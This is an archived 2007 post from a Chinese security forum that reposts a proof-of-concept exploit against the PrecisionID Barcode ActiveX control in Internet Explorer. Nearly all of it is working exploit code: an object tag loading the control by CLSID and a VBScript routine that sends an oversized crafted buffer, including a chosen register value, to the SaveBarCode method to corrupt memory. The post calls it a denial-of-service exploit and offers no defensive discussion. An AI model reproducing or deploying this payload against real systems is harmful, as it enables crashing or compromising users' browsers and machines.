邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2007-5-14 00:50

PrecisionID Barcode ActiveX 1.3 Denial of Service Exploit

[code]<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/12</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------
<b>PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denail of Service</b>
url: [url]http://www.precisionid.com/[/url]

author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
--------------------------------------------------------------------------------

<object classid=&#39;clsid:6C951D10-B07F-11DB-A6ED-0050C2490048&#39; id=&#39;test&#39;></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language=&#39;vbscript&#39;>
Sub tryMe
buff=String(304,"B")
   
get_eax = unescape("%D1%60%61%61")

buff2 = String(709,"C")

egg = buff + get_eax + buff2

test.SaveBarCode egg
End Sub
</script>
</span></span>
</code></pre>

[/code]

页: [1]
© 1999-2008 EvilOctal Security Team